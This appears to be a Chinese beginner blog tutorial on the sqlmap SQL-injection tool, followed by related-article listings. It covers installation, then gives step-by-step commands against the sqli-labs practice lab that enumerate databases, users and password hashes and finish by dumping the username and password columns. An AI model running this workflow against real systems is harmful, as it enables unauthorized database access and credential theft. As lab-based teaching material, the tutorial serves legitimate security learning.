SQLMAP入门

最新推荐文章于 2022-09-04 23:12:12 发布
最新推荐文章于 2022-09-04 23:12:12 发布
阅读量435 收藏 1
点赞数 1
分类专栏: SqlMap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43157606/article/details/103746223
版权

SQLMAP

一、SqlMap介绍

  • sqlmap是由Python编写语言编写的开源渗透测试工具,它主要用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。
  • 它能检测的数据库:Access、MSSQL、MySQL、Oracle、 postgresql、db2、sqlite。
  • 可以进行 sql盲注、union查询、显错注入、延迟注入、post注入、 cookie注入等

二、SqlMap安装

链接:https://pan.baidu.com/s/1CVAFLiLbVaoEKmwSEQPgjg
提取码:vjx9
由于是Python编写语言编写的工具,所以需要Python环境,已提供Python2.7版本,安装即可
在这里插入图片描述
1.下载解压后将解压包放在Python安装目录下
在这里插入图片描述
2.在桌面右键,新建快捷方式
在这里插入图片描述
3.输入快捷方式的名称
在这里插入图片描述
4.复制Python27下sqlmap的路径,右键快捷方式——属性——修改起始位置
在这里插入图片描述
5.双击运行快捷方式,输入sqlmap.py -v 查看版本,界面如下即安装成功
在这里插入图片描述

三、SqlMap的基本操作

基本参数
--is-dba                    当前用户权限
--dbs           			所有数据库
--current-db				网站当前连接数据库
--users						所有数据库用户
--current-user				当前数据库用户
--tables					列表名
--columns					列字段
--dump						获取表中的数据,包含列
--level						测试等级(1-5),默认为1
-D							指定数据库
-T							指定表
-C  						指定列
1.打开sqli-labs的第一关,找到注入点

在这里插入图片描述

2.运行SqlMap,输入sqlmap.py -u “http://localhost/sqli-labs/Less-1/?id=1” 回车。

在这里插入图片描述
测出的信息提示存在
1.布尔盲注
2.显错注入
3.时间盲注
4.union查询
数据库是MySQL
系统为Windows
PHP,Apache,MySQL版本信息等。

3.查看当前用户权限
--is-dba

在这里插入图片描述
在这里插入图片描述
当前用户是管理员(当前权限很大)

4.查看所有数据库
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dbs

在这里插入图片描述

5.查看当前网站数据库
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-db

在这里插入图片描述

6.查看当前网站连接用户
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --current-user

在这里插入图片描述

7.列出这些用户对应的密码
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --password

在这里插入图片描述

8.列出当前数据库有哪些表
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --tables -D security

–tables -D security:查看security数据库的表
在这里插入图片描述

9.指定某数据库某表的列名
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --columns -T users -D security

在这里插入图片描述

10.最后就是列出指定列的数据
sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --dump -C password,username --columns -T users -D security

在这里插入图片描述
总结流程:读取数据库—>读取表—>读取表列—>读取内容

欢迎交流WX:YX_NiMing

'零度
关注
专栏目录
sqlmap的一生
门柚的博客
05-04 113
sqlmap是什么自己百度就对了 环境 由于sqlmap需要在python环境下运行,所以需要先安装python。 1.安装python 百度python找到官网下载python(尽量3.0以上) 2下载好了之后,直接安装即可。安装完毕之后,开始配置环境变量。 在桌面的电脑快捷方式处右单击,属性,高级系统配置,环境变量,选择path,新增,把python3.0(就是刚才安装默认生成的文件夹)的路径加进去,点击确定后离开,还是不懂就百度) 3.到cmd里输入python验证一下是否可用 下载 还是百度sqlm
sqlmap基础
xxx9686的博客
09-15 1543
等等,总的来说这是一个很好的提高效率和速度的参数,但此参数和我们后面要介绍的--threads参数不兼容。是否试一试常用的密码呢?在本章节主要以Webug4.0的sql注入靶场进行讲解,Webug是226安全团队的开源靶场,其名称的含义是我们的漏洞库,也就是我们的靶场,在这里我们将介绍sqlmap绝大多数的常用参数,如读者有兴趣学习其他参数可以使用sqlmap.py -hh命令自行查看(注:读者如是在kali liunx中使用sqlmap只需要执行sqlmap -hh即可)。
Windows下python2,python3双版本安装sqlmap(2020.7.17已解决)
彼岸花苏陌的博客
05-20 803
Windows下python2,python3双版本安装SQLMAP 提要:sqlmap现在只支持Python2,不支持python3 python3不用设置环境变量,Python2需设置环境变量 1.先安装好python2,python3(配置python2的环境变量) 题外话,2020年1月1日开始python2.7停止维护 2.把python2和python3中的python.exe,pythonw.exe改名(不然你在cmd里面找python找不到) 改完名后在python中输入python2
sqlmap过sqli-labs-master以第一关为例
yj959595的博客
07-08 739
先把需要用到的命令列一下,方便使用。 sqlmap -u 注入点 –dbs 暴库 sqlmap -u 注入点 –current-user 当前使用的账户
详细安装sqlmap详细教程
liguangyao213的博客
01-23 3万+
python环境安装+sqlmap快捷方式创建教程 因为sqlmap是用python语言编所以我们在使用sqlmap之前要先安装python环境 python下载地址:Download Python | Python.org 选择适合自己操作系统的版本 下载成功后双击exe文件自动安装 点击安装后会出现安装进度条 待安装完毕,会出现以下界面,代表你安装成功了。 win+r 输入cmd后回车打开命令行界面 在命令行界面输入python -V查看环境变量
sqlmap入门
weixin_47493074的博客
09-04 236
sqlmap查找SQL注入漏洞入门
SQL注入之sqlmap入门教程
m0_56634355的博客
04-09 9173
sqlmap是sql注入必备的也是最常用的工具,是每一位白帽子在的利器之一。
SqlMap入门指南-思维导图.png
04-25
SqlMap入门指南.png
Burp suite和Sqlmap入门
SH1OCK
07-28 730
Burp suite和Sqlmap入门 弱口令爆破 应用场景 系统密码包含大量弱口令,诸如12345、abc、账号密码相同,攻击者就可以利用该漏洞获取较高权限账号 爆破工具 Burp Suite,常用功能抓包(Proxy)、重放(Repeater)、爆破(Intruder) 常用功能介绍 Prox Repeater 手动点击Go一键发送请求的组件 Intruder 本次重点介绍Intruder组件,Intruder组件拥有4个模块,分别是Target、Positions、Pa
SQLMAP入门命令解析
kk的博客
05-27 724
sql注入常用命令解析
Sqlmap中文手册
热门推荐
若水斋
12-22 12万+
这是我自己翻译的Sqlmap1.1.10的中文手册。Sqlmap是十分著名的、自动化的SQL注入工具。为了较为系统地学习Sqlmap,我决定翻译一遍Sqlmap的用户手册,于是便有了此文。由于我英语学得很差,所以翻译地不好。基本上是意译,还加入了我自己的东西,和原文有较大差距。
sqlmap介绍及简单实用
我不是大牛
06-25 1万+
Sqlmap的使用 一、Sqlmap简介 sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,...
【转】sqlmap用户手册
weixin_33851177的博客
06-18 1255
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,它会: 1、判断可注入的参数2、判断可以用那种SQL注入技术来注入3、识别出哪种数据库4、根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的盲注,即不能根据页...
SQLMAP注入教程-11种常见SQLMAP使用方法详解
dfdhxb995397的博客
08-24 4176
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。今天把我一直以来整理的sqlmap笔记发布上来供大家参考。 一共有11种常见SQLmap使用方法:一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 ...
SQLMap的前世今生(Part1)
weixin_30849591的博客
08-31 125
http://www.freebuf.com/sectool/77948.html 一、前言 谈到SQL注入,第一时间就会想到神器SQLMAPSQLMap是一款用来检测与利用的SQL注入开源工具。那么SQLMap在扫描SQL的逻辑到底是怎样实现的呢,接下来就探讨下SQLMap的扫描逻辑,通过了解SQLMap的扫描逻辑打造一款属于自己的SQL扫描工具。 二、SQL扫描规则 要了解SQ...
Sqlmap使用详解
谢公子的博客
12-01 2万+
目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 查看数据库所有用户名的密码 查看数据库当前用户 判断当前用户是否有管理权限 列出数据库管理员角色 查看所有的数据库 查看当前的数据库 爆出指定数据库中的所有的表 爆出指定数据库指定表中的所有的列 爆出指定数据库指定表指定列下的数据 爆出该网站数据库中的所有数据 ...
Sqlmap介绍
weixin_45735361的博客
02-11 2341
Sqlmap是一个开源的渗透工具,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。他有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令 官方网址:http://sqlmap.org/ Sqlmap特点 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQ...
sqlmap简介
taozpwater的专栏
03-30 1万+
1、简介     sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB。采用五种独特的SQL注入技术,分别是:
Sqlmap入门教程:从介绍到环境配置
"Sqlmap是一个开源的渗透测试工具,用于检测和利用SQL注入漏洞,能够自动化接管数据库服务器。它具备强大的检测引擎和多种特性的开关,适用于渗透测试。本课程涵盖了Sqlmap的介绍、环境安装、下载及版本查看。" ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值